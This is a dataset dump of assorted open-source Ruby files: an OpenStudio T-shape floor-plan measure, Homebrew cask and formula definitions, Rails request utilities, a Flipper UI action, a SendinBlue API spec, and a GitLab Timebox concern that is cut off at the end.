hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
112598eec22e2f05fa39e43ecaac4da94cc720e6 | 20,354 | ######################################################################
# Copyright (c) 2008-2015, Alliance for Sustainable Energy.
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
######################################################################
class SetTShapeFloorPlan < OpenStudio::Ruleset::ModelUserScript
# override name to return the name of your script
def name
return "Set T-Shape Floor Plan"
end
# return a vector of arguments
def arguments(model)
result = OpenStudio::Ruleset::OSArgumentVector.new
length = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("length",false)
length.setDisplayName("Building Length (m)")
length.setDefaultValue(40.0)
result << length
width = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("width",false)
width.setDisplayName("Building Width (m)")
width.setDefaultValue(40.0)
result << width
upper_end_width = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("upper_end_width",false)
upper_end_width.setDisplayName("Upper End Width (m)")
upper_end_width.setDefaultValue(20.0)
result << upper_end_width
lower_end_length = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("lower_end_length",false)
lower_end_length.setDisplayName("Lower End Length (m)")
lower_end_length.setDefaultValue(20.0)
result << lower_end_length
left_end_offset = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("left_end_offset",false)
left_end_offset.setDisplayName("Left End Offset (m)")
left_end_offset.setDefaultValue(10.0)
result << left_end_offset
num_floors = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("num_floors",false)
num_floors.setDisplayName("Number of Floors")
num_floors.setDefaultValue(1.0)
result << num_floors
floor_to_floor_height = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("floor_to_floor_height",false)
floor_to_floor_height.setDisplayName("Floor to Floor Height (m)")
floor_to_floor_height.setDefaultValue(3.8)
result << floor_to_floor_height
plenum_height = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("plenum_height", false)
plenum_height.setDisplayName("Plenum Height (m)")
plenum_height.setDefaultValue(1.0)
result << plenum_height
perimeter_zone_depth = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("perimeter_zone_depth", false)
perimeter_zone_depth.setDisplayName("Perimeter Zone Depth (m)")
perimeter_zone_depth.setDefaultValue(4.57)
result << perimeter_zone_depth
return result
end
def run(model, runner, user_arguments)
super(model, runner, user_arguments)
if not runner.validateUserArguments(arguments(model),user_arguments)
return result
end
length = runner.getDoubleArgumentValue("length",user_arguments)
width = runner.getDoubleArgumentValue("width",user_arguments)
upper_end_width = runner.getDoubleArgumentValue("upper_end_width",user_arguments)
lower_end_length = runner.getDoubleArgumentValue("lower_end_length",user_arguments)
left_end_offset = runner.getDoubleArgumentValue("left_end_offset",user_arguments)
num_floors = runner.getDoubleArgumentValue("num_floors",user_arguments)
floor_to_floor_height = runner.getDoubleArgumentValue("floor_to_floor_height",user_arguments)
plenum_height = runner.getDoubleArgumentValue("plenum_height",user_arguments)
perimeter_zone_depth = runner.getDoubleArgumentValue("perimeter_zone_depth",user_arguments)
if length <= 1e-4
runner.registerError("Length must be greater than 0.")
return false
end
if width <= 1e-4
runner.registerError("Width must be greater than 0.")
return false
end
if upper_end_width <= 1e-4 or upper_end_width >= (width - 1e-4)
runner.registerError("Upper end width must be greater than 0 and less than #{width}m.")
return false
end
if lower_end_length <= 1e-4 or lower_end_length >= (length - 1e-4)
runner.registerError("Lower end length must be greater than 0 and less than #{length}m.")
return false
end
if left_end_offset <= 1e-4 or left_end_offset >= (length - lower_end_length - 1e-4)
runner.registerError("Left end offset must be greater than 0 and less than #{length - lower_end_length}m.")
return false
end
if num_floors <= 1e-4
runner.registerError("Number of floors must be greater than 0.")
return false
end
if floor_to_floor_height <= 1e-4
runner.registerError("Floor to floor height must be greater than 0.")
return false
end
if plenum_height < 0
runner.registerError("Plenum height must be greater than or equal to 0.")
return false
end
shortest_side = [length,width,upper_end_width,lower_end_length].min
if perimeter_zone_depth < 0 or 2*perimeter_zone_depth >= (shortest_side - 1e-4)
runner.registerError("Perimeter zone depth must be greater than or equal to 0 and less than #{shortest_side/2}m.")
return false
end
# Create progress bar
runner.createProgressBar("Creating Spaces")
num_total = perimeter_zone_depth>0 ? num_floors*10 : num_floors*2
num_complete = 0
# Loop through the number of floors
for floor in (0..num_floors-1)
z = floor_to_floor_height * floor
#Create a new story within the building
story = OpenStudio::Model::BuildingStory.new(model)
story.setNominalFloortoFloorHeight(floor_to_floor_height)
story.setName("Story #{floor+1}")
lower_ne_point = OpenStudio::Point3d.new(left_end_offset,width - upper_end_width,z)
upper_sw_point = OpenStudio::Point3d.new(0,width - upper_end_width,z)
upper_nw_point = OpenStudio::Point3d.new(0,width,z)
upper_ne_point = OpenStudio::Point3d.new(length,width,z)
upper_se_point = OpenStudio::Point3d.new(length,width - upper_end_width,z)
lower_nw_point = OpenStudio::Point3d.new(left_end_offset + lower_end_length,width - upper_end_width,z)
lower_se_point = OpenStudio::Point3d.new(left_end_offset + lower_end_length,0,z)
lower_sw_point = OpenStudio::Point3d.new(left_end_offset,0,z)
# Identity matrix for setting space origins
m = OpenStudio::Matrix.new(4,4,0)
m[0,0] = 1
m[1,1] = 1
m[2,2] = 1
m[3,3] = 1
# Define polygons for a L-shape building with perimeter core zoning
if perimeter_zone_depth > 0
perimeter_lower_ne_point = lower_ne_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_upper_sw_point = upper_sw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_upper_nw_point = upper_nw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,-perimeter_zone_depth,0)
perimeter_upper_ne_point = upper_ne_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,-perimeter_zone_depth,0)
perimeter_upper_se_point = upper_se_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_nw_point = lower_nw_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_se_point = lower_se_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_sw_point = lower_sw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
west_lower_perimeter_polygon = OpenStudio::Point3dVector.new
west_lower_perimeter_polygon << lower_sw_point
west_lower_perimeter_polygon << lower_ne_point
west_lower_perimeter_polygon << perimeter_lower_ne_point
west_lower_perimeter_polygon << perimeter_lower_sw_point
west_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(west_lower_perimeter_polygon, floor_to_floor_height, model)
west_lower_perimeter_space = west_lower_perimeter_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
west_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
west_lower_perimeter_space.setBuildingStory(story)
west_lower_perimeter_space.setName("Story #{floor+1} West Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_upper_left_perimeter_polygon = OpenStudio::Point3dVector.new
south_upper_left_perimeter_polygon << lower_ne_point
south_upper_left_perimeter_polygon << upper_sw_point
south_upper_left_perimeter_polygon << perimeter_upper_sw_point
south_upper_left_perimeter_polygon << perimeter_lower_ne_point
south_upper_left_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_upper_left_perimeter_polygon, floor_to_floor_height, model)
south_upper_left_perimeter_space = south_upper_left_perimeter_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
south_upper_left_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_upper_left_perimeter_space.setBuildingStory(story)
south_upper_left_perimeter_space.setName("Story #{floor+1} South Upper Left Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
west_upper_perimeter_polygon = OpenStudio::Point3dVector.new
west_upper_perimeter_polygon << upper_sw_point
west_upper_perimeter_polygon << upper_nw_point
west_upper_perimeter_polygon << perimeter_upper_nw_point
west_upper_perimeter_polygon << perimeter_upper_sw_point
west_upper_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(west_upper_perimeter_polygon, floor_to_floor_height, model)
west_upper_perimeter_space = west_upper_perimeter_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
west_upper_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
west_upper_perimeter_space.setBuildingStory(story)
west_upper_perimeter_space.setName("Story #{floor+1} West Upper Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
north_perimeter_polygon = OpenStudio::Point3dVector.new
north_perimeter_polygon << upper_nw_point
north_perimeter_polygon << upper_ne_point
north_perimeter_polygon << perimeter_upper_ne_point
north_perimeter_polygon << perimeter_upper_nw_point
north_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(north_perimeter_polygon, floor_to_floor_height, model)
north_perimeter_space = north_perimeter_space.get
m[0,3] = perimeter_upper_nw_point.x
m[1,3] = perimeter_upper_nw_point.y
m[2,3] = perimeter_upper_nw_point.z
north_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
north_perimeter_space.setBuildingStory(story)
north_perimeter_space.setName("Story #{floor+1} North Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
east_upper_perimeter_polygon = OpenStudio::Point3dVector.new
east_upper_perimeter_polygon << upper_ne_point
east_upper_perimeter_polygon << upper_se_point
east_upper_perimeter_polygon << perimeter_upper_se_point
east_upper_perimeter_polygon << perimeter_upper_ne_point
east_upper_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(east_upper_perimeter_polygon, floor_to_floor_height, model)
east_upper_perimeter_space = east_upper_perimeter_space.get
m[0,3] = perimeter_upper_se_point.x
m[1,3] = perimeter_upper_se_point.y
m[2,3] = perimeter_upper_se_point.z
east_upper_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
east_upper_perimeter_space.setBuildingStory(story)
east_upper_perimeter_space.setName("Story #{floor+1} East Upper Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_upper_right_perimeter_polygon = OpenStudio::Point3dVector.new
south_upper_right_perimeter_polygon << upper_se_point
south_upper_right_perimeter_polygon << lower_nw_point
south_upper_right_perimeter_polygon << perimeter_lower_nw_point
south_upper_right_perimeter_polygon << perimeter_upper_se_point
south_upper_right_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_upper_right_perimeter_polygon, floor_to_floor_height, model)
south_upper_right_perimeter_space = south_upper_right_perimeter_space.get
m[0,3] = lower_nw_point.x
m[1,3] = lower_nw_point.y
m[2,3] = lower_nw_point.z
south_upper_right_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_upper_right_perimeter_space.setBuildingStory(story)
south_upper_right_perimeter_space.setName("Story #{floor+1} South Upper Left Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
east_lower_perimeter_polygon = OpenStudio::Point3dVector.new
east_lower_perimeter_polygon << lower_nw_point
east_lower_perimeter_polygon << lower_se_point
east_lower_perimeter_polygon << perimeter_lower_se_point
east_lower_perimeter_polygon << perimeter_lower_nw_point
east_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(east_lower_perimeter_polygon, floor_to_floor_height, model)
east_lower_perimeter_space = east_lower_perimeter_space.get
m[0,3] = perimeter_lower_se_point.x
m[1,3] = perimeter_lower_se_point.y
m[2,3] = perimeter_lower_se_point.z
east_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
east_lower_perimeter_space.setBuildingStory(story)
east_lower_perimeter_space.setName("Story #{floor+1} East Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_lower_perimeter_polygon = OpenStudio::Point3dVector.new
south_lower_perimeter_polygon << lower_se_point
south_lower_perimeter_polygon << lower_sw_point
south_lower_perimeter_polygon << perimeter_lower_sw_point
south_lower_perimeter_polygon << perimeter_lower_se_point
south_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_lower_perimeter_polygon, floor_to_floor_height, model)
south_lower_perimeter_space = south_lower_perimeter_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
south_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_lower_perimeter_space.setBuildingStory(story)
south_lower_perimeter_space.setName("Story #{floor+1} South Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
north_core_polygon = OpenStudio::Point3dVector.new
north_core_polygon << perimeter_upper_sw_point
north_core_polygon << perimeter_upper_nw_point
north_core_polygon << perimeter_upper_ne_point
north_core_polygon << perimeter_upper_se_point
north_core_polygon << perimeter_lower_nw_point
north_core_polygon << perimeter_lower_ne_point
north_core_space = OpenStudio::Model::Space::fromFloorPrint(north_core_polygon, floor_to_floor_height, model)
north_core_space = north_core_space.get
m[0,3] = perimeter_upper_sw_point.x
m[1,3] = perimeter_upper_sw_point.y
m[2,3] = perimeter_upper_sw_point.z
north_core_space.changeTransformation(OpenStudio::Transformation.new(m))
north_core_space.setBuildingStory(story)
north_core_space.setName("Story #{floor+1} North Core Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_core_polygon = OpenStudio::Point3dVector.new
south_core_polygon << perimeter_lower_sw_point
south_core_polygon << perimeter_lower_ne_point
south_core_polygon << perimeter_lower_nw_point
south_core_polygon << perimeter_lower_se_point
south_core_space = OpenStudio::Model::Space::fromFloorPrint(south_core_polygon, floor_to_floor_height, model)
south_core_space = south_core_space.get
m[0,3] = perimeter_lower_sw_point.x
m[1,3] = perimeter_lower_sw_point.y
m[2,3] = perimeter_lower_sw_point.z
south_core_space.changeTransformation(OpenStudio::Transformation.new(m))
south_core_space.setBuildingStory(story)
south_core_space.setName("Story #{floor+1} South Core Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
# Minimal zones
else
north_polygon = OpenStudio::Point3dVector.new
north_polygon << upper_sw_point
north_polygon << upper_nw_point
north_polygon << upper_ne_point
north_polygon << upper_se_point
north_polygon << lower_nw_point
north_polygon << lower_ne_point
north_space = OpenStudio::Model::Space::fromFloorPrint(north_polygon, floor_to_floor_height, model)
north_space = north_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
north_space.changeTransformation(OpenStudio::Transformation.new(m))
north_space.setBuildingStory(story)
north_space.setName("Story #{floor+1} North Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_polygon = OpenStudio::Point3dVector.new
south_polygon << lower_sw_point
south_polygon << lower_ne_point
south_polygon << lower_nw_point
south_polygon << lower_se_point
south_space = OpenStudio::Model::Space::fromFloorPrint(south_polygon, floor_to_floor_height, model)
south_space = south_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
south_space.changeTransformation(OpenStudio::Transformation.new(m))
south_space.setBuildingStory(story)
south_space.setName("Story #{floor+1} South Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
end
#Set vertical story position
story.setNominalZCoordinate(z)
end #End of floor loop
runner.destroyProgressBar
end
end
SetTShapeFloorPlan.new.registerWithApplication
| 49.765281 | 152 | 0.707183 |
e20ea0329262243c945799d5ef5a1cd711bf30d5 | 488 | cask "freeplane" do
version "1.8.6"
sha256 "72cbc35735f8e67023a254696b59b32ecd56b18a199d170fe66a00b422bc24b5"
# downloads.sourceforge.net/freeplane/ was verified as official when first introduced to the cask
url "https://downloads.sourceforge.net/freeplane/freeplane%20stable/Freeplane-#{version}.dmg"
appcast "https://sourceforge.net/projects/freeplane/rss?path=/freeplane%20stable"
name "Freeplane"
homepage "https://freeplane.sourceforge.io/"
app "Freeplane.app"
end
| 37.538462 | 99 | 0.788934 |
38fca4b920d2bdb9ad77b3b9961645d3d6a2eca0 | 2,049 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'java_buildpack/component'
require 'java_buildpack/util/qualify_path'
module JavaBuildpack
module Component
# An abstraction encapsulating the Environment Variables of an application.
#
# A new instance of this type should be created once for the application.
class EnvironmentVariables < Array
include JavaBuildpack::Util
# Creates an instance of the Environment Variables abstraction.
#
# @param [Pathname] droplet_root the root directory of the droplet
def initialize(droplet_root)
@droplet_root = droplet_root
end
# Adds an environment variable. Prepends +$PWD+ to any variable values that are
# paths (relative to the droplet root) to ensure that the path is always accurate.
#
# @param [String] key the variable name
# @param [String] value the variable value
# @return [EnvironmentVariables] +self+ for chaining
def add_environment_variable(key, value)
self << "#{key}=#{qualify_value(value)}"
end
# Returns the contents as an environment variable formatted as +<key>=<value>+
#
# @return [String] the contents as an environment variable
def as_env_vars
join(' ')
end
private
def qualify_value(value)
value.respond_to?(:relative_path_from) ? qualify_path(value) : value
end
end
end
end
| 32.52381 | 88 | 0.704734 |
7adfc980eede7f85bbf6a91c1f82c1dd166666c5 | 2,948 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SibApiV3Sdk::GetTransacEmailContent
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'GetTransacEmailContent' do
before do
# run before each test
@instance = SibApiV3Sdk::GetTransacEmailContent.new
end
after do
# run after each test
end
describe 'test an instance of GetTransacEmailContent' do
it 'should create an instance of GetTransacEmailContent' do
expect(@instance).to be_instance_of(SibApiV3Sdk::GetTransacEmailContent)
end
end
describe 'test attribute "email"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "subject"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "template_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "events"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "body"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "attachment_count"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 37.794872 | 839 | 0.699796 |
e2e5023f38e049041fc29f1a8820834681eee101 | 3,111 | # frozen_string_literal: true
require "active_support/core_ext/hash/indifferent_access"
module ActionDispatch
class Request
class Utils # :nodoc:
mattr_accessor :perform_deep_munge, default: true
def self.each_param_value(params, &block)
case params
when Array
params.each { |element| each_param_value(element, &block) }
when Hash
params.each_value { |value| each_param_value(value, &block) }
when String
block.call params
end
end
def self.normalize_encode_params(params)
if perform_deep_munge
NoNilParamEncoder.normalize_encode_params params
else
ParamEncoder.normalize_encode_params params
end
end
def self.check_param_encoding(params)
case params
when Array
params.each { |element| check_param_encoding(element) }
when Hash
params.each_value { |value| check_param_encoding(value) }
when String
unless params.valid_encoding?
# Raise Rack::Utils::InvalidParameterError for consistency with Rack.
# ActionDispatch::Request#GET will re-raise as a BadRequest error.
raise Rack::Utils::InvalidParameterError, "Invalid encoding for parameter: #{params.scrub}"
end
end
end
def self.set_binary_encoding(request, params, controller, action)
BinaryParamEncoder.encode(request, params, controller, action)
end
class ParamEncoder # :nodoc:
# Convert nested Hash to HashWithIndifferentAccess.
def self.normalize_encode_params(params)
case params
when Array
handle_array params
when Hash
if params.has_key?(:tempfile)
ActionDispatch::Http::UploadedFile.new(params)
else
params.transform_values do |val|
normalize_encode_params(val)
end.with_indifferent_access
end
else
params
end
end
def self.handle_array(params)
params.map! { |el| normalize_encode_params(el) }
end
end
# Remove nils from the params hash.
class NoNilParamEncoder < ParamEncoder # :nodoc:
def self.handle_array(params)
list = super
list.compact!
list
end
end
class BinaryParamEncoder # :nodoc:
def self.encode(request, params, controller, action)
return params unless controller && controller.valid_encoding?
if binary_params_for?(request, controller, action)
ActionDispatch::Request::Utils.each_param_value(params.except(:controller, :action)) do |param|
param.force_encoding ::Encoding::ASCII_8BIT
end
end
params
end
def self.binary_params_for?(request, controller, action)
request.controller_class_for(controller).binary_params_for?(action)
rescue MissingController
false
end
end
end
end
end
| 30.203883 | 107 | 0.621665 |
ff22f1900f3a02cbe601905a604de209674661bf | 814 | require 'flipper/ui/action'
require 'flipper/ui/decorators/feature'
module Flipper
module UI
module Actions
class PercentageOfActorsGate < UI::Action
route %r{features/[^/]*/percentage_of_actors/?\Z}
def post
feature_name = Rack::Utils.unescape(request.path.split("/")[-2])
feature = flipper[feature_name.to_sym]
@feature = Decorators::Feature.new(feature)
begin
feature.enable_percentage_of_actors params["value"]
rescue ArgumentError => exception
error = Rack::Utils.escape("Invalid percentage of actors value: #{exception.message}")
redirect_to("/features/#{@feature.key}?error=#{error}")
end
redirect_to "/features/#{@feature.key}"
end
end
end
end
end
| 29.071429 | 98 | 0.624079 |
219ec87a02a5b944c0988fa5f4d3771df703e060 | 430 | require 'formula'
class Rhash < Formula
homepage 'http://rhash.anz.ru/'
url 'http://downloads.sourceforge.net/project/rhash/rhash/1.3.0/rhash-1.3.0-src.tar.gz'
sha1 'f51a7f3eea051ebef5c16db5c4a53ff3c2ef90c2'
def install
# install target isn't parallel-safe
ENV.j1
system 'make', 'install', "PREFIX=",
"DESTDIR=#{prefix}",
"CC=#{ENV.cc}"
end
end
| 25.294118 | 89 | 0.595349 |
5d2aaa174b329074b445b7816902020352f41964 | 769 | #---
# Excerpted from "The RSpec Book",
# published by The Pragmatic Bookshelf.
# Copyrights apply to this code. It may not be used to create training material,
# courses, books, articles, and the like. Contact us if you are in doubt.
# We make no guarantees that this code is fit for any purpose.
# Visit http://www.pragmaticprogrammer.com/titles/achbd for more book information.
#---
class User < ActiveRecord::Base
belongs_to :subscription
has_many :received_messages, :class_name => Message.name,
:foreign_key => "recipient_id"
has_many :sent_messages, :class_name => Message.name,
:foreign_key => "sender_id"
def send_message(message_attrs)
if subscription.can_send_message?
sent_messages.create! message_attrs
end
end
end | 34.954545 | 82 | 0.736021 |
d53594eb5afe5726a1aa08f85b6b6a811b2917c1 | 7,920 | # frozen_string_literal: true
module Timebox
extend ActiveSupport::Concern
include AtomicInternalId
include CacheMarkdownField
include Gitlab::SQL::Pattern
include IidRoutes
include Referable
include StripAttribute
include FromUnion
TimeboxStruct = Struct.new(:title, :name, :id, :class_name) do
# Ensure these models match the interface required for exporting
def serializable_hash(_opts = {})
{ title: title, name: name, id: id }
end
def self.declarative_policy_class
"TimeboxPolicy"
end
def to_global_id
::Gitlab::GlobalId.build(self, model_name: class_name, id: id)
end
end
# Represents a "No Timebox" state used for filtering Issues and Merge
# Requests that have no timeboxes assigned.
None = TimeboxStruct.new('No Timebox', 'No Timebox', 0)
Any = TimeboxStruct.new('Any Timebox', '', -1)
Upcoming = TimeboxStruct.new('Upcoming', '#upcoming', -2)
Started = TimeboxStruct.new('Started', '#started', -3)
included do
# Defines the same constants above, but inside the including class.
const_set :None, TimeboxStruct.new("No #{self.name}", "No #{self.name}", 0, self.name)
const_set :Any, TimeboxStruct.new("Any #{self.name}", '', -1, self.name)
const_set :Upcoming, TimeboxStruct.new('Upcoming', '#upcoming', -2, self.name)
const_set :Started, TimeboxStruct.new('Started', '#started', -3, self.name)
alias_method :timebox_id, :id
validates :group, presence: true, unless: :project
validates :project, presence: true, unless: :group
validate :timebox_type_check
validate :start_date_should_be_less_than_due_date, if: proc { |m| m.start_date.present? && m.due_date.present? }
validate :dates_within_4_digits
cache_markdown_field :title, pipeline: :single_line
cache_markdown_field :description, issuable_reference_expansion_enabled: true
belongs_to :project
belongs_to :group
has_many :issues
has_many :labels, -> { distinct.reorder('labels.title') }, through: :issues
has_many :merge_requests
scope :of_projects, ->(ids) { where(project_id: ids) }
scope :of_groups, ->(ids) { where(group_id: ids) }
scope :closed, -> { with_state(:closed) }
scope :for_projects, -> { where(group: nil).includes(:project) }
scope :with_title, -> (title) { where(title: title) }
scope :for_projects_and_groups, -> (projects, groups) do
projects = projects.compact if projects.is_a? Array
projects = [] if projects.nil?
groups = groups.compact if groups.is_a? Array
groups = [] if groups.nil?
from_union([where(project_id: projects), where(group_id: groups)], remove_duplicates: false)
end
# A timebox is within the timeframe (start_date, end_date) if it overlaps
# with that timeframe:
#
# [ timeframe ]
# ----| ................ # Not overlapping
# |--| ................ # Not overlapping
# ------|............... # Overlapping
# -----------------------| # Overlapping
# ---------|............ # Overlapping
# |-----|............ # Overlapping
# |--------------| # Overlapping
# |--------------------| # Overlapping
# ...|-----|...... # Overlapping
# .........|-----| # Overlapping
# .........|--------- # Overlapping
# |-------------------- # Overlapping
# .........|--------| # Overlapping
# ...............|--| # Overlapping
# ............... |-| # Not Overlapping
# ............... |-- # Not Overlapping
#
# where: . = in timeframe
# ---| no start
# |--- no end
# |--| defined start and end
#
scope :within_timeframe, -> (start_date, end_date) do
where('start_date is not NULL or due_date is not NULL')
.where('start_date is NULL or start_date <= ?', end_date)
.where('due_date is NULL or due_date >= ?', start_date)
end
strip_attributes! :title
alias_attribute :name, :title
end
class_methods do
# Searches for timeboxes with a matching title or description.
#
# This method uses ILIKE on PostgreSQL
#
# query - The search query as a String
#
# Returns an ActiveRecord::Relation.
def search(query)
fuzzy_search(query, [:title, :description])
end
def filter_by_state(timeboxes, state)
case state
when 'closed' then timeboxes.closed
when 'all' then timeboxes
else timeboxes.active
end
end
def count_by_state
reorder(nil).group(:state).count
end
def predefined_id?(id)
[Any.id, None.id, Upcoming.id, Started.id].include?(id)
end
def predefined?(timebox)
predefined_id?(timebox&.id)
end
end
##
# Returns the String necessary to reference a Timebox in Markdown. Group
# timeboxes only support name references, and do not support cross-project
# references.
#
# format - Symbol format to use (default: :iid, optional: :name)
#
# Examples:
#
# Milestone.first.to_reference # => "%1"
# Iteration.first.to_reference(format: :name) # => "*iteration:\"goal\""
# Milestone.first.to_reference(cross_namespace_project) # => "gitlab-org/gitlab-foss%1"
# Iteration.first.to_reference(same_namespace_project) # => "gitlab-foss*iteration:1"
#
def to_reference(from = nil, format: :name, full: false)
format_reference = timebox_format_reference(format)
reference = "#{self.class.reference_prefix}#{format_reference}"
if project
"#{project.to_reference_base(from, full: full)}#{reference}"
else
reference
end
end
def reference_link_text(from = nil)
self.class.reference_prefix + self.title
end
def title=(value)
write_attribute(:title, sanitize_title(value)) if value.present?
end
def timebox_name
model_name.singular
end
def group_timebox?
group_id.present?
end
def project_timebox?
project_id.present?
end
def safe_title
title.to_slug.normalize.to_s
end
def resource_parent
group || project
end
def to_ability_name
model_name.singular
end
def merge_requests_enabled?
if group_timebox?
# Assume that groups have at least one project with merge requests enabled.
# Otherwise, we would need to load all of the projects from the database.
true
elsif project_timebox?
project&.merge_requests_enabled?
end
end
def weight_available?
resource_parent&.feature_available?(:issue_weights)
end
private
def timebox_format_reference(format = :iid)
raise ArgumentError, _('Unknown format') unless [:iid, :name].include?(format)
if group_timebox? && format == :iid
raise ArgumentError, _('Cannot refer to a group %{timebox_type} by an internal id!') % { timebox_type: timebox_name }
end
if format == :name && !name.include?('"')
%("#{name}")
else
iid
end
end
# Timebox should be either a project timebox or a group timebox
def timebox_type_check
if group_id && project_id
field = project_id_changed? ? :project_id : :group_id
errors.add(field, _("%{timebox_name} should belong either to a project or a group.") % { timebox_name: timebox_name })
end
end
def start_date_should_be_less_than_due_date
if due_date <= start_date
errors.add(:due_date, _("must be greater than start date"))
end
end
def dates_within_4_digits
if start_date && start_date > Date.new(9999, 12, 31)
errors.add(:start_date, _("date must not be after 9999-12-31"))
end
if due_date && due_date > Date.new(9999, 12, 31)
errors.add(:due_date, _("date must not be after 9999-12-31"))
end
end
def sanitize_title(value)
CGI.unescape_html(Sanitize.clean(value.to_s))
